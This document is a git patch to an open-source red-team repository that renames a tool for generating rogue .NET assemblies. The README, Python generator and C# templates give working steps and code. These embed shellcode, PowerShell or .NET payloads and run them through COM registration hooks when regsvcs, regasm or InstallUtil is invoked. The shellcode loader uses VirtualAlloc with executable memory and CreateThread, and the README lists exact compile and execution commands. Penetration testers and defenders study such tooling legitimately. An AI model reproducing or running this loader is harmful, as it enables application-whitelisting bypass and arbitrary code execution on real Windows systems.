From 72c1136fda6d782dcd7291f8c66553bf21765f3d Mon Sep 17 00:00:00 2001 From: "Mariusz B. / mgeeky" Date: Tue, 5 May 2020 20:22:05 +0200 Subject: [PATCH] Updated rogue-dot-net --- red-teaming/README.md | 2 +- red-teaming/regsvcs/README.md | 78 -- red-teaming/regsvcs/regsvcs.dll | Bin 5120 -> 0 bytes red-teaming/rogue-dot-net/README.md | 90 +++ .../System.Management.Automation.dll | Bin .../{regsvcs => rogue-dot-net}/build.ps1 | 10 +- .../generateRogueDotNet.py} | 742 +++++++++--------- .../{regsvcs => rogue-dot-net}/key.snk | Bin red-teaming/rogue-dot-net/notepad64.bin | Bin 0 -> 279 bytes .../program-template.cs | Bin red-teaming/rogue-dot-net/program.cs | 141 ++++ red-teaming/rogue-dot-net/rogue.dll | Bin 0 -> 5632 bytes 12 files changed, 619 insertions(+), 444 deletions(-) delete mode 100644 red-teaming/regsvcs/README.md delete mode 100644 red-teaming/regsvcs/regsvcs.dll create mode 100644 red-teaming/rogue-dot-net/README.md rename red-teaming/{regsvcs => rogue-dot-net}/System.Management.Automation.dll (100%) rename red-teaming/{regsvcs => rogue-dot-net}/build.ps1 (99%) rename red-teaming/{regsvcs/generateRegsvcs.py => rogue-dot-net/generateRogueDotNet.py} (80%) rename red-teaming/{regsvcs => rogue-dot-net}/key.snk (100%) create mode 100644 red-teaming/rogue-dot-net/notepad64.bin rename red-teaming/{regsvcs => rogue-dot-net}/program-template.cs (100%) create mode 100644 red-teaming/rogue-dot-net/program.cs create mode 100644 red-teaming/rogue-dot-net/rogue.dll diff --git a/red-teaming/README.md b/red-teaming/README.md index 5adf385..5f49556 100644 --- a/red-teaming/README.md +++ b/red-teaming/README.md @@ -316,7 +316,7 @@ $ ./markOwnedNodesInNeo4j.py kerberoasted.txt - [**`PhishingPost`**](https://github.com/mgeeky/PhishingPost) - (PHP Script intdended to be used during Phishing campaigns as a credentials collector linked to backdoored HTML
action parameter. -- [**`regsvcs`**](https://github.com/mgeeky/Penetration-Testing-Tools/tree/master/red-teaming/regsvcs) - Set of scripts, requirements and instructions for generating .NET Assemblies valid for **Regasm**/**Regsvcs** code execution primitives. +- [**`rogue-dot-net`**](https://github.com/mgeeky/Penetration-Testing-Tools/tree/master/red-teaming/rogue-dot-net) - Set of scripts, requirements and instructions for generating .NET Assemblies valid for **Regasm**/**Regsvcs**/**InstallUtil** code execution primitives. - [**`RobustPentestMacro`**](https://github.com/mgeeky/RobustPentestMacro) - This is a rich-featured Visual Basic macro code for use during Penetration Testing assignments, implementing various advanced post-exploitation techniques. diff --git a/red-teaming/regsvcs/README.md b/red-teaming/regsvcs/README.md deleted file mode 100644 index d5f6565..0000000 --- a/red-teaming/regsvcs/README.md +++ /dev/null 
@@ -1,78 +0,0 @@ -## Rogue .NET Assembly for Regsvcs/Regasm Code Execution - -Follow below described steps to properly generate your source code and then compile it to a .NET Assembly valid for Regasm/Regsvcs: - -### Step 1: Generate key.snk file - -``` -powershell -file build.ps1 -``` - -### Step 2: Generate source code file - -Included in this directory script is a helper utility allowing one to quickly generate desired csharp source code file to be used for further `csc` compilation. - -Usage: - -``` -python3 generateRegsvcs.py --help - - :: Regsvcs Code Execution Source code generation utility - To be used during Red-Team assignments to launch Powershell/Shellcode payloads via Regsvcs/Regasm. - Mariusz B. / mgeeky, - -usage: .\generateRegsvcs.py [options] - -positional arguments: - inputFile Input file to be embeded within C# code. May be either Powershell script, raw binary Shellcode or .NET Assembly (PE/EXE) file. - -optional arguments: - -h, --help show this help message and exit - -e, --exe Specified input file is an Mono/.Net assembly PE/EXE. WARNING: Launching EXE is currently possible ONLY WITH MONO/.NET assembly EXE/DLL files, not an ordinary native PE/EXE! - -r, --raw Specified input file is a raw Shellcode to be injected in self process in a separate Thread. -``` - -Sample use case: - -``` -python3 generateRegsvcs.py -r notepad64.bin > program.cs - - :: Regsvcs Code Execution Source code generation utility - To be used during Red-Team assignments to launch Powershell/Shellcode payloads via Regsvcs/Regasm. - Mariusz B. / mgeeky, - -[?] File specified as raw Shellcode. 
- -``` - - -### Step 3: Compilate library .NET Assembly - -``` -%WINDIR%\Microsoft.NET\Framework\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /target:library /out:regsvcs.dll /keyfile:key.snk program.cs -``` - -If you passed Powershell code to be launched in a .NET Runspace, then an additional assembly will have to be used to compile resulting source code properly - meaning System.Management.Automation.dll (provided with this script). Then proper compilation command will be: - -``` -%WINDIR%\Microsoft.NET\Framework64\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /r:System.Management.Automation.dll /target:library /out:regsvcs.dll /keyfile:key.snk program.cs -``` - - -### Step 4: Code execution via Regsvcs or Regasm: - -``` -%WINDIR%\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe regsvcs.dll -``` - or -``` -%WINDIR%\Microsoft.NET\Framework\v4.0.30319\regasm.exe regsvcs.dll -``` - or -``` -%WINDIR%\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe /U regsvcs.dll -``` - or -``` -%WINDIR%\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U regsvcs.dll -``` 
diff --git a/red-teaming/regsvcs/regsvcs.dll b/red-teaming/regsvcs/regsvcs.dll deleted file mode 100644 index ab69e54ed711f8c6d23b9e68f9b5bf1c1ba1a34d..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 5120 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 diff --git a/red-teaming/rogue-dot-net/README.md b/red-teaming/rogue-dot-net/README.md new file mode 100644 index 0000000..1b7d9b4 --- /dev/null +++ b/red-teaming/rogue-dot-net/README.md 
@@ -0,0 +1,90 @@ +## Rogue .NET Assembly for Regsvcs/Regasm/InstallUtil Code Execution + +Follow below described steps to properly generate your source code and then compile it into a nice rogue .NET Assembly ready to be executed by: + +- [Regasm](https://lolbas-project.github.io/lolbas/Binaries/Regasm/) +- [Regsvcs](https://lolbas-project.github.io/lolbas/Binaries/Regsvcs/) +- [InstallUtil](https://lolbas-project.github.io/lolbas/Binaries/Installutil/) + +### Step 1: Generate key.snk file + +``` +powershell -file build.ps1 +``` + +### Step 2: Generate source code file + +Included in this directory script is a helper utility allowing one to quickly generate desired csharp source code file to be used for further `csc` compilation. + +Usage: + +``` +python3 generateRogueDotNet.py --help + + :: Rogue .NET Source Code Generation Utility + To be used during Red-Team assignments to launch Powershell/Shellcode payloads via Regsvcs/Regasm/InstallUtil. + Mariusz B. / mgeeky, + +usage: .\generateRogueDotNet.py [options] + +positional arguments: + inputFile Input file to be embeded within C# code. May be either Powershell script, raw binary Shellcode or .NET Assembly (PE/EXE) file. + +optional arguments: + -h, --help show this help message and exit + -e, --exe Specified input file is an Mono/.Net assembly PE/EXE. WARNING: Launching EXE is currently possible ONLY WITH MONO/.NET assembly EXE/DLL files, not an ordinary native PE/EXE! + -r, --raw Specified input file is a raw Shellcode to be injected in self process in a separate Thread. +``` + +Sample use case: + +``` +python3 generateRogueDotNet.py -r notepad64.bin > program.cs + + :: Rogue .NET Source Code Generation Utility + To be used during Red-Team assignments to launch Powershell/Shellcode payloads via Regsvcs/Regasm/InstallUtil. + Mariusz B. / mgeeky, + +[?] File specified as raw Shellcode. 
+ +``` + + +### Step 3: Compilate library .NET Assembly + +``` +%WINDIR%\Microsoft.NET\Framework\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /target:library /out:rogue.dll /keyfile:key.snk program.cs +``` + +If you passed Powershell code to be launched in a .NET Runspace, then an additional assembly will have to be used to compile resulting source code properly - meaning System.Management.Automation.dll (provided with this script). Then proper compilation command will be: + +``` +%WINDIR%\Microsoft.NET\Framework64\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /r:System.Management.Automation.dll /target:library /out:rogue.dll /keyfile:key.snk program.cs +``` + + +### Step 4: Code execution via Regsvcs, Regasm or InstallUtil: + +- x86: +``` +%WINDIR%\Microsoft.NET\Framework\v4.0.30319\regasm.exe rogue.dll +%WINDIR%\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U rogue.dll + +%WINDIR%\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe rogue.dll +%WINDIR%\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe /U rogue.dll + +%WINDIR%\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exe /logfile= /logtoconsole=false /U rogue.dll +%WINDIR%\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logfile= /logtoconsole=false /U rogue.dll +``` + +- x64: +``` +%WINDIR%\Microsoft.NET\Framework64\v4.0.30319\regasm.exe rogue.dll +%WINDIR%\Microsoft.NET\Framework64\v4.0.30319\regasm.exe /U rogue.dll + +%WINDIR%\Microsoft.NET\Framework64\v4.0.30319\regsvcs.exe rogue.dll +%WINDIR%\Microsoft.NET\Framework64\v4.0.30319\regsvcs.exe /U rogue.dll + +%WINDIR%\Microsoft.NET\Framework64\v2.0.50727\InstallUtil.exe /logfile= /logtoconsole=false /U rogue.dll +%WINDIR%\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /logtoconsole=false /U rogue.dll +``` \ No newline at end of file 
diff --git a/red-teaming/regsvcs/System.Management.Automation.dll b/red-teaming/rogue-dot-net/System.Management.Automation.dll similarity index 100% rename from red-teaming/regsvcs/System.Management.Automation.dll rename to red-teaming/rogue-dot-net/System.Management.Automation.dll diff --git a/red-teaming/regsvcs/build.ps1 b/red-teaming/rogue-dot-net/build.ps1 similarity index 99% rename from red-teaming/regsvcs/build.ps1 rename to red-teaming/rogue-dot-net/build.ps1 index 83251b0..9277013 100644 --- a/red-teaming/regsvcs/build.ps1 +++ b/red-teaming/rogue-dot-net/build.ps1 @@ -1,5 +1,5 @@ -$key = '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' -$Content = [System.Convert]::FromBase64String($key) -Set-Content key.snk -Value $Content -Encoding Byte - -& "$env:Windir\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /r:System.EnterpriseServices.dll /target:library /out:regsvcs.dll /keyfile:key.snk program.cs +$key = 'BwIAAAAkAABSU0EyAAQAAAEAAQBhXtvkSeH85E31z64cAX+X2PWGc6DHP9VaoD13CljtYau9SesUzKVLJdHphY5ppg5clHIGaL7nZbp6qukLH0lLEq/vW979GWzVAgSZaGVCFpuk6p1y69cSr3STlzljJrY76JIjeS4+RhbdWHp99y8QhwRllOC0qu/WxZaffHS2te/PKzIiTuFfcP46qxQoLR8s3QZhAJBnn9TGJkbix8MTgEt7hD1DC2hXv7dKaC531ZWqGXB54OnuvFbD5P2t+vyvZuHNmAy3pX0BDXqwEfoZZ+hiIk1YUDSNOE79zwnpVP1+BN0PK5QCPCS+6zujfRlQpJ+nfHLLicweJ9uT7OG3g/P+JpXGN0/+Hitolufo7Ucjh+WvZAU//dzrGny5stQtTmLxdhZbOsNDJpsqnzwEUfL5+o8OhujBHDm/ZQ0361mVsSVWrmgDPKHGGRx+7FbdgpBEq3m15/4zzg343V9NBwt1+qZU+TSVPU0wRvkWiZRerjmDdehJIboWsx4V8aiWx8FPPngEmNz89tBAQ8zbIrJFfmtYnj1fFmkNu3lglOefcacyYEHPX/tqcBuBIg/cpcDHps/6SGCCciX3tufnEeDMAQjmLku8X4zHcgJx6FpVK7qeEuvyV0OGKvNor9b/WKQHIHjkzG+z6nWHMoMYV5VMTZ0jLM5aZQ6ypwmFZaNmtL6KDzKv8L1YN2TkKjXEoWulXNliBpelsSJyuICplrCTPGGSxPGihT3rpZ9tbLZUefrFnLNiHfVjNi53Yg4=' +$Content = [System.Convert]::FromBase64String($key) +Set-Content key.snk -Value $Content -Encoding Byte + +& "$env:Windir\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /r:System.EnterpriseServices.dll /target:library /out:regsvcs.dll /keyfile:key.snk program.cs 
diff --git a/red-teaming/regsvcs/generateRegsvcs.py b/red-teaming/rogue-dot-net/generateRogueDotNet.py similarity index 80% rename from red-teaming/regsvcs/generateRegsvcs.py rename to red-teaming/rogue-dot-net/generateRogueDotNet.py index 60e8170..ce71b3a 100644 --- a/red-teaming/regsvcs/generateRegsvcs.py +++ b/red-teaming/rogue-dot-net/generateRogueDotNet.py 
@@ -1,360 +1,382 @@ -#!/usr/bin/python3 -# -# Red-Teaming script that constructs C# code for Regsvcs code execution technique. -# -# Step 1: Generate source code file -# cmd> python3 generateRegsvcs.py -r payload.bin > program.cs -# -# Step 2: Compilate library .NET Assembly -# cmd> %WINDIR%\Microsoft.NET\Framework\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /target:library /out:regsvcs.dll /keyfile:key.snk program.cs -# -# if you passed Powershell code to be launched in a .NET Runspace, then an additional assembly will have to be used -# to compile resulting source code properly - meaning System.Management.Automation.dll (provided with this script). -# Then proper compilation command will be: -# -# cmd> %WINDIR%\Microsoft.NET\Framework64\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /r:System.Management.Automation.dll /target:library /out:regsvcs.dll /keyfile:key.snk program.cs -# -# -# Step 3: Code execution via Regsvcs or Regasm: -# cmd> %WINDIR%\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe regsvcs.dll -# or -# cmd> %WINDIR%\Microsoft.NET\Framework\v4.0.30319\regasm.exe regsvcs.dll -# or -# cmd> %WINDIR%\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe /U regsvcs.dll -# or -# cmd> %WINDIR%\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U regsvcs.dll -# -# Mariusz B. 
/ mgeeky, -# - -import re -import os -import io -import sys -import gzip -import base64 -import string -import struct -import random -import binascii -import argparse - - -def getCompressedPayload(filePath): - out = io.BytesIO() - encoded = '' - with open(filePath, 'rb') as f: - inp = f.read() - - with gzip.GzipFile(fileobj = out, mode = 'w') as fo: - fo.write(inp) - - encoded = base64.b64encode(out.getvalue()) - - powershell = "$s = New-Object IO.MemoryStream(, [Convert]::FromBase64String('{}')); IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s, [IO.Compression.CompressionMode]::Decompress))).ReadToEnd();".format( - encoded.decode() - ) - return powershell - -def getSourceFileContents(payload, _format): - launchCode = '' - usings = '' - - if _format == 'exe': - - exeLaunchCode = string.Template(''' - public static void Execute() { - - string payload = "$payload2"; - byte[] decoded = System.Convert.FromBase64String(payload); - - Assembly asm = Assembly.Load(decoded); - MethodInfo method = asm.EntryPoint; - object instance = asm.CreateInstance(method.Name); - method.Invoke(instance, null); - - }''').safe_substitute( - payload2 = base64.b64encode(payload.encode()).decode() - ) - - - launchCode = exeLaunchCode - - elif _format == 'raw': - - foo = str(binascii.hexlify(payload), 'ascii') - fooarr = ['0x{}'.format(foo[i:i+2]) for i in range(0, len(foo), 2)] - encodedPayload = ' ' - - for i in range(len(fooarr)): - if i % 16 == 0 and i > 0: - encodedPayload += '\n ' - encodedPayload += '{}, '.format(fooarr[i]) - - encodedPayload = encodedPayload.strip()[:-1] - - shellcodeLoader = string.Template(''' - [DllImport("kernel32")] - private static extern IntPtr VirtualAlloc( - IntPtr lpAddress, UIntPtr dwSize, - UInt32 flAllocationType, - UInt32 flProtect - ); - - [DllImport("kernel32")] - private static extern bool VirtualFree( - IntPtr lpAddress, - UInt32 dwSize, - UInt32 dwFreeType - ); - - [DllImport("kernel32")] - private static extern IntPtr 
CreateThread( - UInt32 lpThreadAttributes, - UInt32 dwStackSize, - IntPtr lpStartAddress, - IntPtr param, - UInt32 dwCreationFlags, - ref UInt32 lpThreadId - ); - - [DllImport("kernel32")] - private static extern bool CloseHandle( - IntPtr hHandle - ); - - [DllImport("kernel32")] - private static extern UInt32 WaitForSingleObject( - IntPtr hHandle, - UInt32 dwMilliseconds - ); - - private static UInt32 MEM_COMMIT = 0x1000; - private static UInt32 PAGE_EXECUTE_READWRITE = 0x40; - private static UInt32 MEM_RELEASE = 0x8000; - - public static void Execute() { - - byte[] payload = new byte[$payloadSize] { - $payload2 - }; - - IntPtr funcAddr = VirtualAlloc(IntPtr.Zero, (UIntPtr)payload.Length, MEM_COMMIT, PAGE_EXECUTE_READWRITE); - Marshal.Copy(payload, 0, funcAddr, payload.Length); - IntPtr hThread = IntPtr.Zero; - UInt32 threadId = 0; - - hThread = CreateThread(0, 0, funcAddr, IntPtr.Zero, 0, ref threadId); - WaitForSingleObject(hThread, 0xFFFFFFFF); - - CloseHandle(hThread); - VirtualFree(funcAddr, 0, MEM_RELEASE); - - }''').safe_substitute( - payload2 = encodedPayload, - payloadSize = len(payload) - ) - - launchCode = shellcodeLoader - - else: - usings += ''' -using System.Management.Automation; -using System.Management.Automation.Runspaces; -''' - powershellLaunchCode = string.Template(''' - public static void Execute() { - - byte[] payload = System.Convert.FromBase64String("$payload2"); - string decoded = System.Text.Encoding.UTF8.GetString(payload); - - Runspace runspace = RunspaceFactory.CreateRunspace(); - runspace.Open(); - - Pipeline pipeline = runspace.CreatePipeline(); - pipeline.Commands.AddScript(decoded); - pipeline.Invoke(); - - runspace.Close(); - }''').safe_substitute( - payload2 = base64.b64encode(payload.encode()).decode() - ) - - launchCode = powershellLaunchCode - - - template = string.Template(''' -using System; -using System.Diagnostics; -using System.Reflection; -using System.Runtime.InteropServices; -using System.EnterpriseServices; -$usings 
- -/* - Author: Casey Smith, Twitter: @subTee - Customized by: Mariusz B. / mgeeky, - License: BSD 3-Clause - - Step 1: Create Your Strong Name Key -> key.snk - - $key = 'BwIAAAAkAABSU0EyAAQAAAEAAQBhXtvkSeH85E31z64cAX+X2PWGc6DHP9VaoD13CljtYau9SesUzKVLJdHphY5ppg5clHIGaL7nZbp6qukLH0lLEq/vW979GWzVAgSZaGVCFpuk6p1y69cSr3STlzljJrY76JIjeS4+RhbdWHp99y8QhwRllOC0qu/WxZaffHS2te/PKzIiTuFfcP46qxQoLR8s3QZhAJBnn9TGJkbix8MTgEt7hD1DC2hXv7dKaC531ZWqGXB54OnuvFbD5P2t+vyvZuHNmAy3pX0BDXqwEfoZZ+hiIk1YUDSNOE79zwnpVP1+BN0PK5QCPCS+6zujfRlQpJ+nfHLLicweJ9uT7OG3g/P+JpXGN0/+Hitolufo7Ucjh+WvZAU//dzrGny5stQtTmLxdhZbOsNDJpsqnzwEUfL5+o8OhujBHDm/ZQ0361mVsSVWrmgDPKHGGRx+7FbdgpBEq3m15/4zzg343V9NBwt1+qZU+TSVPU0wRvkWiZRerjmDdehJIboWsx4V8aiWx8FPPngEmNz89tBAQ8zbIrJFfmtYnj1fFmkNu3lglOefcacyYEHPX/tqcBuBIg/cpcDHps/6SGCCciX3tufnEeDMAQjmLku8X4zHcgJx6FpVK7qeEuvyV0OGKvNor9b/WKQHIHjkzG+z6nWHMoMYV5VMTZ0jLM5aZQ6ypwmFZaNmtL6KDzKv8L1YN2TkKjXEoWulXNliBpelsSJyuICplrCTPGGSxPGihT3rpZ9tbLZUefrFnLNiHfVjNi53Yg4=' - $Content = [System.Convert]::FromBase64String($key) - Set-Content key.snk -Value $Content -Encoding Byte - - Step 2: Compile source code: - C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe /r:System.EnterpriseServices.dll /target:library /out:regsvcs.dll /keyfile:key.snk program.cs - - Step 3: Execute your payload! 
- C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\regsvcs.exe regsvcs.dll - C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\regasm.exe regsvcs.dll - C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\regsvcs.exe /U regsvcs.dll - C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\regasm.exe /U regsvcs.dll -*/ - -namespace Program -{ - public class Bypass : ServicedComponent - { - public Bypass() - { - } - - // This executes if registration is successful - [ComRegisterFunction] - public static void RegisterClass( string key ) - { - Shellcode.Execute(); - } - - // This executes if registration fails - [ComUnregisterFunction] - public static void UnRegisterClass( string key ) - { - Shellcode.Execute(); - } - } - - public class Shellcode - { - $launchCode - } -}''').safe_substitute( - launchCode = launchCode, - usings = usings - ) - - return template - -def detectFileIsExe(filePath, forced = False): - first1000 = [] - - with open(filePath, 'rb') as f: - first1000 = f.read()[:1000] - - if not (first1000[0] == 'M' and first1000[1] == 'Z'): - return False - - elfanew = struct.unpack(' - -''') - if len(argv) < 2: - print('Usage: ./generateRegsvcs.py ') - sys.exit(-1) - - args = opts(argv) - - _format = 'powershell' - - if args.exe: - if not detectFileIsExe(args.inputFile, args.exe): - sys.stderr.write('[?] File not recognized as PE/EXE.\n\n') - return False - - _format = 'exe' - sys.stderr.write('[?] File recognized as PE/EXE.\n\n') - with open(args.inputFile, 'rb') as f: - payload = f.read() - - elif args.raw: - _format = 'raw' - sys.stderr.write('[?] File specified as raw Shellcode.\n\n') - with open(args.inputFile, 'rb') as f: - payload = f.read() - - else: - sys.stderr.write('[?] Powershell code given.\n') - sys.stderr.write('[?] 
WARNING: You need to have System.Management.Automation assemblies preinstalled.\n') - sys.stderr.write(' Obtain them from: .\n\n') - - if args.inputFile.endswith('.exe'): - return False - - payload = getCompressedPayload(args.inputFile) - - output = getSourceFileContents(payload, _format) - - print(output) - - management = '' - if _format == 'powershell': - management = ' /r:System.Management.Automation.dll' - - commands = ''' - -===================================== - -Step 1: Create Your Strong Name Key -> key.snk - - $key = 'BwIAAAAkAABSU0EyAAQAAAEAAQBhXtvkSeH85E31z64cAX+X2PWGc6DHP9VaoD13CljtYau9SesUzKVLJdHphY5ppg5clHIGaL7nZbp6qukLH0lLEq/vW979GWzVAgSZaGVCFpuk6p1y69cSr3STlzljJrY76JIjeS4+RhbdWHp99y8QhwRllOC0qu/WxZaffHS2te/PKzIiTuFfcP46qxQoLR8s3QZhAJBnn9TGJkbix8MTgEt7hD1DC2hXv7dKaC531ZWqGXB54OnuvFbD5P2t+vyvZuHNmAy3pX0BDXqwEfoZZ+hiIk1YUDSNOE79zwnpVP1+BN0PK5QCPCS+6zujfRlQpJ+nfHLLicweJ9uT7OG3g/P+JpXGN0/+Hitolufo7Ucjh+WvZAU//dzrGny5stQtTmLxdhZbOsNDJpsqnzwEUfL5+o8OhujBHDm/ZQ0361mVsSVWrmgDPKHGGRx+7FbdgpBEq3m15/4zzg343V9NBwt1+qZU+TSVPU0wRvkWiZRerjmDdehJIboWsx4V8aiWx8FPPngEmNz89tBAQ8zbIrJFfmtYnj1fFmkNu3lglOefcacyYEHPX/tqcBuBIg/cpcDHps/6SGCCciX3tufnEeDMAQjmLku8X4zHcgJx6FpVK7qeEuvyV0OGKvNor9b/WKQHIHjkzG+z6nWHMoMYV5VMTZ0jLM5aZQ6ypwmFZaNmtL6KDzKv8L1YN2TkKjXEoWulXNliBpelsSJyuICplrCTPGGSxPGihT3rpZ9tbLZUefrFnLNiHfVjNi53Yg4=' - $Content = [System.Convert]::FromBase64String($key) - Set-Content key.snk -Value $Content -Encoding Byte - -Step 2: Compile source code: - C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe /r:System.EnterpriseServices.dll{} /target:library /out:regsvcs.dll /keyfile:key.snk program.cs - -Step 3: Execute your payload! 
- C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\regsvcs.exe regsvcs.dll - C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\regasm.exe regsvcs.dll - C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\regsvcs.exe /U regsvcs.dll - C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\regasm.exe /U regsvcs.dll - '''.format(management) - - if 'PROGRAMFILES(X86)' in os.environ: - commands = commands.replace('Framework', 'Framework64') - - sys.stderr.write(commands) - -if __name__ == '__main__': - main(sys.argv) +#!/usr/bin/python3 +# +# Red-Teaming script that constructs C# code for Regsvcs/Regasm/InstallUtil code execution technique. +# +# Step 1: Generate source code file +# cmd> python3 generateRogueDotNet.py -r payload.bin > program.cs +# +# Step 2: Compilate library .NET Assembly +# cmd> %WINDIR%\Microsoft.NET\Framework\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /target:library /out:rogue.dll /keyfile:key.snk program.cs +# +# if you passed Powershell code to be launched in a .NET Runspace, then an additional assembly will have to be used +# to compile resulting source code properly - meaning System.Management.Automation.dll (provided with this script). 
+# Then proper compilation command will be: +# +# cmd> %WINDIR%\Microsoft.NET\Framework64\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /r:System.Management.Automation.dll /target:library /out:rogue.dll /keyfile:key.snk program.cs +# +# Step 3: Code execution via Regsvcs, Regasm or InstallUtil: +# x86: +# cmd> %WINDIR%\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe rogue.dll +# cmd> %WINDIR%\Microsoft.NET\Framework\v4.0.30319\regasm.exe rogue.dll + +# cmd> %WINDIR%\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe /U rogue.dll +# cmd> %WINDIR%\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U rogue.dll + +# cmd> %WINDIR%\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exe /logfile= /logtoconsole=false /U rogue.dll +# cmd> %WINDIR%\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logfile= /logtoconsole=false /U rogue.dll +# x64: +# cmd> %WINDIR%\Microsoft.NET\Framework64\v4.0.30319\regsvcs.exe rogue.dll +# cmd> %WINDIR%\Microsoft.NET\Framework64\v4.0.30319\regasm.exe rogue.dll + +# cmd> %WINDIR%\Microsoft.NET\Framework64\v4.0.30319\regsvcs.exe /U rogue.dll +# cmd> %WINDIR%\Microsoft.NET\Framework64\v4.0.30319\regasm.exe /U rogue.dll + +# cmd> 